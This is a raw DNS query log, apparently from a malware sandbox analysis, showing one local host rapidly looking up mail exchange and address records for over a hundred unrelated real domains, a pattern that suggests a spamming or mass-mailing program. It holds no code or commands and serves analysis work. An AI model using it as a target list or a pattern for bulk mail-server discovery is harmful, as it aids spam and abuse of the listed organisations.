                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.086138010 CEST1.1.1.1192.168.2.30x7cdbNo error (0)hasslo.ns.cloudflare.com172.64.35.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.250438929 CEST108.162.195.134192.168.2.30x1111No error (0)wallstreetinstitute.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.320195913 CEST54.161.68.15192.168.2.30x2011No error (0)tvcskyshop.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.605586052 CEST1.1.1.1192.168.2.30x1836No error (0)dns1.intnet.mu202.123.2.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.805876017 CEST1.1.1.1192.168.2.30x23faNo error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.870136023 CEST1.1.1.1192.168.2.30x4cb5No error (0)nsn1.mijndomein.nl156.154.64.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.034447908 CEST156.154.64.107192.168.2.30xab14No error (0)denbiggelaar.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.034447908 CEST156.154.64.107192.168.2.30xab14No error (0)denbiggelaar.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.035433054 CEST204.74.108.247192.168.2.30xba14No error (0)touchmarknb.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.035433054 CEST204.74.108.247192.168.2.30xba14No error (0)touchmarknb.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.090410948 CEST162.159.26.217192.168.2.30xba14No error (0)lakecountryacademy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.090410948 CEST162.159.26.217192.168.2.30xba14No error (0)lakecountryacademy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.090410948 CEST162.159.26.217192.168.2.30xba14No error (0)lakecountryacademy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.090410948 CEST162.159.26.217192.168.2.30xba14No error (0)lakecountryacademy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.090410948 CEST162.159.26.217192.168.2.30xba14No error (0)lakecountryacademy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.117105961 CEST202.123.2.6192.168.2.30x6313No error (0)mauritiustelecom.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.117105961 CEST202.123.2.6192.168.2.30x6313No error (0)mauritiustelecom.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.179711103 CEST1.1.1.1192.168.2.30xbe6No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.198333979 CEST1.1.1.1192.168.2.30x6dfeNo error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.346003056 CEST1.1.1.1192.168.2.30xe613No error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.593359947 CEST156.154.132.200192.168.2.30x2b17No error (0)xoxy.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.604763031 CEST1.1.1.1192.168.2.30x51eaNo error (0)ns2.centrum.cz93.185.103.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.913950920 CEST1.1.1.1192.168.2.30x1d43No error (0)ns2.centralnic.net185.24.64.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.933410883 CEST93.185.103.191192.168.2.30xd717No error (0)cbox.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.933410883 CEST93.185.103.191192.168.2.30xd717No error (0)cbox.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.933410883 CEST93.185.103.191192.168.2.30xd717No error (0)cbox.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.933410883 CEST93.185.103.191192.168.2.30xd717No error (0)cbox.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.973654032 CEST161.53.160.100192.168.2.30x618Name error (3)sedmasekunda.hrnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.077271938 CEST185.24.64.10192.168.2.30x6d19No error (0)fletchers.uk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.133048058 CEST1.1.1.1192.168.2.30xe150No error (0)ns1.locaweb.com.br186.202.8.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.138925076 CEST156.154.130.100192.168.2.30xac19No error (0)ccamatil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.138925076 CEST156.154.130.100192.168.2.30xac19No error (0)ccamatil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.139430046 CEST13.107.236.8192.168.2.30xac19No error (0)pcl.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.265674114 CEST80.247.239.4192.168.2.30x9c19No error (0)vivreeco.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.290791988 CEST185.67.45.231192.168.2.30xac19No error (0)tovarish.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.296585083 CEST81.19.33.2192.168.2.30xac19No error (0)lanskroun.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.296585083 CEST81.19.33.2192.168.2.30xac19No error (0)lanskroun.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.297049046 CEST156.154.132.200192.168.2.30x481aNo error (0)bienydebuenas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.297900915 CEST156.154.132.200192.168.2.30x481aNo error (0)xoxy.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.326093912 CEST1.1.1.1192.168.2.30x8aNo error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.460807085 CEST186.202.8.254192.168.2.30x481aNo error (0)cury.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.471543074 CEST162.159.24.10192.168.2.30x481aNo error (0)enggwarestaging.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.797116995 CEST1.1.1.1192.168.2.30xfec2Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.928003073 CEST1.1.1.1192.168.2.30xb673No error (0)c.ns.ac-versailles.fr195.83.95.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.119105101 CEST13.248.158.159192.168.2.30x301eNo error (0)whrlaw.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.138986111 CEST217.160.82.244192.168.2.30x301eNo error (0)monicol.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.250551939 CEST195.83.95.3192.168.2.30x301eNo error (0)ac-paris.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.250551939 CEST195.83.95.3192.168.2.30x301eNo error (0)ac-paris.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.257584095 CEST1.1.1.1192.168.2.30xed3fNo error (0)ns1.websupport.sk45.10.97.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.426364899 CEST1.1.1.1192.168.2.30xe099No error (0)pat.ns.cloudflare.com108.162.192.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.426364899 CEST1.1.1.1192.168.2.30xe099No error (0)pat.ns.cloudflare.com172.64.32.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.426364899 CEST1.1.1.1192.168.2.30xe099No error (0)pat.ns.cloudflare.com173.245.58.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.592108011 CEST108.162.192.139192.168.2.30xf21No error (0)s-sm.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.592108011 CEST108.162.192.139192.168.2.30xf21No error (0)s-sm.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.592108011 CEST108.162.192.139192.168.2.30xf21No error (0)s-sm.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.592108011 CEST108.162.192.139192.168.2.30xf21No error (0)s-sm.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.592108011 CEST108.162.192.139192.168.2.30xf21No error (0)s-sm.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.600830078 CEST45.10.97.11192.168.2.30xe61fNo error (0)ardaco.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.640140057 CEST1.1.1.1192.168.2.30x29fcNo error (0)ns9.zoneedit.com139.177.204.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.735663891 CEST1.1.1.1192.168.2.30xb86aNo error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.816574097 CEST156.154.133.200192.168.2.30xf921No error (0)availabledatingworld.bizMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.825284004 CEST169.241.10.14192.168.2.30xf921No error (0)nv.ccsd.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.825284004 CEST169.241.10.14192.168.2.30xf921No error (0)nv.ccsd.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.825284004 CEST169.241.10.14192.168.2.30xf921No error (0)nv.ccsd.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.825284004 CEST169.241.10.14192.168.2.30xf921No error (0)nv.ccsd.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.825284004 CEST169.241.10.14192.168.2.30xf921No error (0)nv.ccsd.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.829657078 CEST13.248.158.159192.168.2.30xe921No error (0)iclud.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.832223892 CEST1.1.1.1192.168.2.30xa06aNo error (0)ns-1680.awsdns-18.co.uk205.251.198.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.837615967 CEST50.87.144.83192.168.2.30xf921No error (0)compzon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.853636026 CEST139.177.204.42192.168.2.30xe921No error (0)ginospizza.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.853636026 CEST139.177.204.42192.168.2.30xe921No error (0)ginospizza.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.853636026 CEST139.177.204.42192.168.2.30xe921No error (0)ginospizza.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.857261896 CEST162.159.26.110192.168.2.30xe921No error (0)moldmasters.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.857261896 CEST162.159.26.110192.168.2.30xe921No error (0)moldmasters.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.920114994 CEST1.1.1.1192.168.2.30xbbcaNo error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.972055912 CEST91.195.241.8192.168.2.30xf921No error (0)dead.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.995949984 CEST205.251.198.144192.168.2.30x2223No error (0)memorialhermann.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.995949984 CEST205.251.198.144192.168.2.30x2223No error (0)memorialhermann.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.997159958 CEST1.1.1.1192.168.2.30xa603No error (0)a9-66.akam.net184.85.248.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.011642933 CEST180.163.194.134192.168.2.30xf921No error (0)genhr.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.011642933 CEST180.163.194.134192.168.2.30xf921No error (0)genhr.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.160882950 CEST184.85.248.66192.168.2.30xce23No error (0)chpnet.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.160882950 CEST184.85.248.66192.168.2.30xce23No error (0)chpnet.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.160882950 CEST184.85.248.66192.168.2.30xce23No error (0)chpnet.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.160882950 CEST184.85.248.66192.168.2.30xce23No error (0)chpnet.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.160882950 CEST184.85.248.66192.168.2.30xce23No error (0)chpnet.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.160882950 CEST184.85.248.66192.168.2.30xce23No error (0)chpnet.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.160882950 CEST184.85.248.66192.168.2.30xce23No error (0)chpnet.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.160882950 CEST184.85.248.66192.168.2.30xce23No error (0)chpnet.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.160882950 CEST184.85.248.66192.168.2.30xce23No error (0)chpnet.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.160882950 CEST184.85.248.66192.168.2.30xce23No error (0)chpnet.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.162488937 CEST108.162.194.3192.168.2.30xce23No error (0)harlandassociates.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.178345919 CEST156.154.132.200192.168.2.30xdd23No error (0)mailnesia.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.186456919 CEST64.70.19.80192.168.2.30xdd23No error (0)krim.wsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.187345982 CEST162.159.24.201192.168.2.30xdd23No error (0)gulatiexports.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.187345982 CEST162.159.24.201192.168.2.30xdd23No error (0)gulatiexports.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.187345982 CEST162.159.24.201192.168.2.30xdd23No error (0)gulatiexports.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.187345982 CEST162.159.24.201192.168.2.30xdd23No error (0)gulatiexports.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.187345982 CEST162.159.24.201192.168.2.30xdd23No error (0)gulatiexports.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.188673973 CEST173.199.96.96192.168.2.30xdd23No error (0)minglebox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.231920958 CEST162.159.24.117192.168.2.30xdd23No error (0)cdd.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.231920958 CEST162.159.24.117192.168.2.30xdd23No error (0)cdd.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.346438885 CEST109.122.98.114192.168.2.30xdd23No error (0)vektor.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.461507082 CEST1.1.1.1192.168.2.30xae13No error (0)ns6.oleane.net194.2.0.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.668112040 CEST1.1.1.1192.168.2.30x80caNo error (0)ns1049.ui-dns.de217.160.80.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.677226067 CEST1.1.1.1192.168.2.30x7d1eNo error (0)cvswl.org172.67.149.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.677226067 CEST1.1.1.1192.168.2.30x7d1eNo error (0)cvswl.org104.21.55.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.706216097 CEST1.1.1.1192.168.2.30xa5a7No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.770014048 CEST194.2.0.6192.168.2.30x9c26No error (0)onet.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.770014048 CEST194.2.0.6192.168.2.30x9c26No error (0)onet.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.878701925 CEST217.160.80.49192.168.2.30x7727No error (0)cci-dialog.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.960114956 CEST1.1.1.1192.168.2.30xa94bNo error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.960114956 CEST1.1.1.1192.168.2.30xa94bNo error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.960114956 CEST1.1.1.1192.168.2.30xa94bNo error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.006603003 CEST1.1.1.1192.168.2.30x8c04Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.392585993 CEST1.1.1.1192.168.2.30x6682No error (0)dns1.a1.net80.120.17.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.560380936 CEST162.159.26.136192.168.2.30x5f2bNo error (0)asorent.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.560380936 CEST162.159.26.136192.168.2.30x5f2bNo error (0)asorent.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.568408966 CEST1.1.1.1192.168.2.30x66ddNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.572951078 CEST103.224.182.5192.168.2.30x6f2bNo error (0)outook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.600205898 CEST162.159.26.136192.168.2.30x8e2bNo error (0)asorent.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.600205898 CEST162.159.26.136192.168.2.30x8e2bNo error (0)asorent.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.619474888 CEST162.159.26.136192.168.2.30x9e2bNo error (0)asorent.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.619474888 CEST162.159.26.136192.168.2.30x9e2bNo error (0)asorent.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.631198883 CEST1.1.1.1192.168.2.30xc8caNo error (0)oh28ya.com35.75.241.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.631198883 CEST1.1.1.1192.168.2.30xc8caNo error (0)oh28ya.com54.178.105.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.718159914 CEST80.120.17.26192.168.2.30x5f2bNo error (0)adler-lacke.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.784111023 CEST194.0.14.1192.168.2.30xbd2bName error (3)fermo.cznonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.797039032 CEST80.120.17.26192.168.2.30xad2bNo error (0)adler-lacke.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.858073950 CEST1.1.1.1192.168.2.30x4a2aNo error (0)ns3.nic.ru194.85.61.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.154227972 CEST9.9.9.9192.168.2.30xe92eNo error (0)fletchers.uk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.185911894 CEST8.8.4.4192.168.2.30xf92eNo error (0)visimax.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.197925091 CEST1.0.0.1192.168.2.30xe92eNo error (0)polishprincess.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.220175028 CEST194.85.61.20192.168.2.30x6c2eNo error (0)tc-sm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.220175028 CEST194.85.61.20192.168.2.30x6c2eNo error (0)tc-sm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.220175028 CEST194.85.61.20192.168.2.30x6c2eNo error (0)tc-sm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.252428055 CEST208.67.222.222192.168.2.30xe92eNo error (0)tvcskyshop.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.252428055 CEST208.67.222.222192.168.2.30xe92eNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.270648003 CEST1.1.1.1192.168.2.30xf9e2No error (0)ns-607.awsdns-11.net205.251.194.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.387464046 CEST1.1.1.1192.168.2.30x37a9No error (0)com-edit.fr34.174.61.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.387545109 CEST1.1.1.1192.168.2.30x37a9No error (0)com-edit.fr34.174.61.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.418498039 CEST80.120.17.26192.168.2.30x572fNo error (0)adler-lacke.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.446352959 CEST205.251.194.95192.168.2.30xaf30No error (0)eslite.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.449021101 CEST162.159.24.43192.168.2.30xaf30No error (0)247virtualassistant.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.707887888 CEST208.67.222.222192.168.2.30x92fNo error (0)jamesengineering.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.707887888 CEST208.67.222.222192.168.2.30x92fNo error (0)jamesengineering.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.707887888 CEST208.67.222.222192.168.2.30x92fNo error (0)jamesengineering.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.711321115 CEST1.1.1.1192.168.2.30x4517No error (0)dns-a.mailobj.net213.182.54.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.837256908 CEST1.1.1.1192.168.2.30xaa3bNo error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.876293898 CEST162.159.26.49192.168.2.30x1033No error (0)p33.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.876293898 CEST162.159.26.49192.168.2.30x1033No error (0)p33.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.018023968 CEST213.182.54.23192.168.2.30x1033No error (0)netcourrier.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.069333076 CEST1.1.1.1192.168.2.30x9c08No error (0)ns1.selectel.ru188.68.203.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.311614990 CEST1.1.1.1192.168.2.30xc383No error (0)ns1.bizland.com38.113.1.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.448685884 CEST188.68.203.10192.168.2.30x2335No error (0)onlinesadik.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.480890989 CEST108.162.193.190192.168.2.30xd936No error (0)pelicanhill.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.480890989 CEST108.162.193.190192.168.2.30xd936No error (0)pelicanhill.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.555078983 CEST38.113.1.34192.168.2.30xd936No error (0)graystoneventures.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.624022961 CEST1.1.1.1192.168.2.30xeaa4No error (0)dns12.ovh.net213.251.188.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.789397001 CEST163.114.216.17192.168.2.30xcd38No error (0)binarysecuritysolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.789397001 CEST163.114.216.17192.168.2.30xcd38No error (0)binarysecuritysolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.789397001 CEST163.114.216.17192.168.2.30xcd38No error (0)binarysecuritysolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.862370014 CEST1.1.1.1192.168.2.30x2b1No error (0)dns1.a2zsitesolutions.net107.155.71.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.936420918 CEST213.251.188.131192.168.2.30xcd38No error (0)visiorisk.comMX (Mail exchange)IN (0x0001)false
